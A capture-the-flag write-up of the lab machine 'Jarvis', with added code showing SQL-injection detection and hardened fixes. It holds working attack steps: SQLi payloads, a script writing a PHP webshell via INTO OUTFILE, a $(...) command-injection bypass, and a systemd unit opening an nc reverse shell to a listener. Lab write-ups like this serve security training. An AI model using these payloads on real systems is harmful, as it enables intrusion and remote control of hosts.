0x00 Recon

sudo rustscan -a 10.10.10.143  --ulimit 10000  -- -sC -sS -sV -A  
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-'' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.10.143:22
Open 10.10.10.143:80
Open 10.10.10.143:64999

...

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03f34e22363e3b813079ed4967651667 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzv4ZGiO8sDRbIsdZhchg+dZEot3z8++mrp9m0VjP6qxr70SwkE0VGu+GkH7vGapJQLMvjTLjyHojU/AcEm9MWTRWdpIrsUirgawwROic6HmdK2e0bVUZa8fNJIoyY1vPa4uNJRKZ+FNoT8qdl9kvG1NGdBl1+zoFbR9az0sgcNZJ1lZzZNnr7zv/Jghd/ZWjeiiVykomVRfSUCZe5qZ/aV6uVmBQ/mdqpXyxPIl1pG642C5j5K84su8CyoiSf0WJ2Vj8GLiKU3EXQzluQ8QJJPJTjj028yuLjDLrtugoFn43O6+IolMZZvGU9Man5Iy5OEWBay9Tn0UDSdjbSPi1X
| 256 25d808a84d6de8d2f8434a2c20c85af6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCDW2OapO3Dq1CHlnKtWhDucQdl2yQNJA79qP0TDmZBR967hxE9ESMegRuGfQYq0brLSR8Xi6f3O8XL+3bbWbGQ=
| 256 77d4ae1fb0be151ff8cdc8153ac369e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPuKufVSUgOG304mZjkK8IrZcAGMm76Rfmq2by7C0Nmo
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Stark Hotel
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
64999/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET

A strange port, 64999, is open; all you get when you browse to it is

Hey you have been banned for 90 seconds, don't be bad 

So leave that aside for now and go look at port 80 first.
Browsing around, room.php takes a suspicious GET parameter:
http://10.10.10.143/room.php?cod=1
An id passed straight in as ?cod=1 like this looks very likely to be injectable.

0x01 SQLI

Testing with the two payloads below shows there is basically a SQL injection here: the 1=2 case returns an empty room page while the 1=1 case renders normally, so the input is reaching the query.

http://10.10.10.143/room.php?cod=1%20and%201=2--
http://10.10.10.143/room.php?cod=1%20and%201=1--

First use ORDER BY to determine how many columns the query returns (it keeps working up to the real column count and breaks one past it):

http://10.10.10.143/room.php?cod=1%20order%20by%207--

Testing confirms there are 7 columns.
At this point my rough plan was to use the SQLi to pull the admin account's username and password
and then SSH in on port 22.
But after writing a script and dumping the database, there was nothing useful in it. TT
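To show why the two boolean payloads and the ORDER BY walk actually tell you what they do, here is an added example (not code from the original writeup and not the box's real room.php) that runs the same three probes against a constructed, in-memory table with the 7 columns found above, and then shows the parameterised query that makes the identical payload inert. The real target is MySQL; sqlite3 is used only so the example runs offline, and the table layout and row contents are made up.

```python
import sqlite3

# Added example (not the box's real code). A constructed, in-memory stand-in for
# the hotel's room table with the 7 columns the ORDER BY test established. The
# real target runs MySQL; sqlite3 is used here only so the example runs offline.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE room(cod INTEGER, name TEXT, price INTEGER, descrip TEXT, "
        "star INTEGER, image TEXT, mini TEXT)"
    )
    con.executemany(
        "INSERT INTO room VALUES (?,?,?,?,?,?,?)",
        [
            (1, "Suite", 200, "constructed row", 5, "suite.jpg", "suite_mini.jpg"),
            (2, "Double", 90, "constructed row", 3, "double.jpg", "double_mini.jpg"),
        ],
    )
    return con


def vulnerable_lookup(con, cod):
    # Mirrors room.php?cod=... being concatenated straight into the SQL text.
    return con.execute("SELECT * FROM room WHERE cod=" + cod).fetchall()


def page_oracle(con, cod):
    # What the attacker observes: True = room rendered, False = empty page,
    # None = the query errored (the page breaks).
    try:
        return len(vulnerable_lookup(con, cod)) > 0
    except sqlite3.Error:
        return None


def is_injectable(con, cod="1"):
    # The two payloads from the page: 'and 1=1' must keep the room,
    # 'and 1=2' must make it disappear.
    return (page_oracle(con, f"{cod} and 1=1--") is True
            and page_oracle(con, f"{cod} and 1=2--") is False)


def count_columns(con, cod="1", max_cols=32):
    # ORDER BY n is accepted while n <= column count and errors one past it.
    for n in range(1, max_cols + 1):
        if page_oracle(con, f"{cod} order by {n}--") is None:
            return n - 1
    return None


def safe_lookup(con, cod):
    # The fix: bind cod as a parameter so it can never change the SQL text.
    return con.execute("SELECT * FROM room WHERE cod=?", (cod,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db))          # True
    print("columns:", count_columns(db))             # 7
    print("bound payload:", safe_lookup(db, "1 and 1=1--"))  # []
```

With the parameterised lookup the string "1 and 1=1--" is compared against the cod column as a single value and simply matches nothing; the query text is never altered, which is the whole point of the fix.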

0x02 SQLI to RCE

After the dump-then-SSH idea failed, it occurred to me that SQLi to RCE was still on the table.
Since this is a lab box I didn't think too hard about it and just tried writing a one-liner PHP webshell (一句話木馬) to disk with UNION ... INTO OUTFILE:

from requests import get

# room.php?cod= is the injectable parameter; the 7 UNION columns match the
# count found with ORDER BY, and the shell goes in the column rendered as text.
target = "http://10.10.10.143/room.php?cod=1"
key = "<?php echo shell_exec($_GET['c']);?>"

payload = f" union select 1,2,\"{key}\",4,5,6,7 into OUTFILE '/var/www/html/hehe.php'"

# requests percent-encodes the spaces; the trailing -- comments out the rest of the query.
r = get(target + payload + "--")
print(r.status_code)

It worked: http://10.10.10.143/hehe.php?c=id runs commands as www-data. For INTO OUTFILE to land in the web root, the database user needs the FILE privilege, secure_file_priv must not restrict the destination, and the MySQL process must be able to write to /var/www/html; all of that evidently held on this box.

A plain webshell is clumsy to work with, so swap it for a reverse shell right away.

0x03 Privilege Escalation

Once inside, I found I could run sudo -l:

www-data@jarvis:/var/www/html$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

www-data may run simpler.py as pepper without a password, so let's see whether that file can be used to escalate to pepper.
Reading through it, this function is straightforwardly command-injectable: user input is concatenated into os.system() behind a blocklist of shell characters.

def exec_ping():
    # Blocklist only: $, (, ) and newlines are not on it, so $(...) gets through.
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)   # runs via /bin/sh -c, which expands $(...)

Use this function to pop a reverse shell.
First create a file named aaa containing a bash reverse shell,
then feed the function an "IP" that ends in a $(...) substitution: none of $, ( or ) are on the blocklist, so sh expands it before ping ever runs.
Then:

www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************

Enter an IP: 0.0.0.$(bash /var/www/html/aaa)

That gives a reverse shell as pepper,
and user.txt is sitting in pepper's home directory:

pepper@jarvis:~$ cat user.txt
6xxxxxxxxxxxxxxxxxxxxxxxxxx5
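The exec_ping() filter above is a textbook blocklist failure: it enumerates a few metacharacters and lets everything else reach a shell. The following is an added example, not code from simpler.py or from the original writeup, that reproduces the blocklist exactly as the page shows it, reports what /bin/sh would be handed for the payload used above, and sits it beside a hardened replacement that allowlists the input with ipaddress.ip_address() and runs ping as an argv list with no shell. The ping arguments ('-c', '4') in the hardened version are my choice, not from the page.

```python
import ipaddress
import subprocess

# Added example, not code from simpler.py. The blocklist below is copied from
# the page's exec_ping(); the hardened functions are an assumed replacement.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blocklist_allows(user_input):
    """True if simpler.py's blocklist would let this string reach os.system()."""
    return not any(token in user_input for token in FORBIDDEN)


def vulnerable_command(user_input):
    """The exact string the original passes to /bin/sh -c, or None if blocked.
    Anything sh expands ($(...), backquotes are blocked, but newlines and $()
    are not) runs before ping does."""
    if not blocklist_allows(user_input):
        return None
    return 'ping ' + user_input


def safe_ping_argv(user_input):
    """Allowlist: the argument must parse as an IPv4/IPv6 address. Returns an
    argv list so no shell ever interprets it. Raises ValueError otherwise."""
    try:
        ip = ipaddress.ip_address(user_input.strip())
    except ValueError as exc:
        raise ValueError(f"not an IP address: {user_input!r}") from exc
    return ['ping', '-c', '4', str(ip)]


def safe_ping(user_input):
    """Runs the hardened ping without a shell (not exercised by the test)."""
    return subprocess.run(safe_ping_argv(user_input), check=False)


if __name__ == "__main__":
    bypass = "0.0.0.$(bash /var/www/html/aaa)"   # the payload used on the box
    print("blocklist passes the payload:", blocklist_allows(bypass))   # True
    print("sh would run:", vulnerable_command(bypass))
    print("hardened argv:", safe_ping_argv("10.10.10.143"))
    try:
        safe_ping_argv(bypass)
    except ValueError as err:
        print("hardened version rejects it:", err)
```

Two things the example makes visible that the writeup only implies: a newline in the input also slips past the blocklist (sh treats it as a command separator), and the hardened version never needs a blocklist at all because the only thing it will ever pass to ping is the canonical text of a parsed address.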

Finally, search for SUID binaries with find:

pepper@jarvis:~$ find / -perm -u=s -type f 2>/dev/null       
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/bin/systemctl stands out: it is not SUID on a stock Debian install. Because the binary runs with euid 0, systemd accepts its requests as root, so any unit it enables and starts runs its ExecStart as root.
So escalate through systemctl directly.
Details are here: https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740
First create a root.service (replace 10.XX.XX.XX with your listener):

cat root.service 
[Unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.XX.XX.XX 7777 >/tmp/f'

[Install]
WantedBy=multi-user.target

Write it to /dev/shm. Any writable location works, since enable with an absolute path symlinks the unit into /etc/systemd/system, but my commands use /dev/shm/root.service, so that is where it goes.

Then, with nc listening on port 7777:

/bin/systemctl enable /dev/shm/root.service
/bin/systemctl start root

The listener receives a reverse shell as root,
and root.txt follows:

root@jarvis:~# cat root.txt
3xxxxxxxxxxxxxxxxxxxxxxxxxxxxx4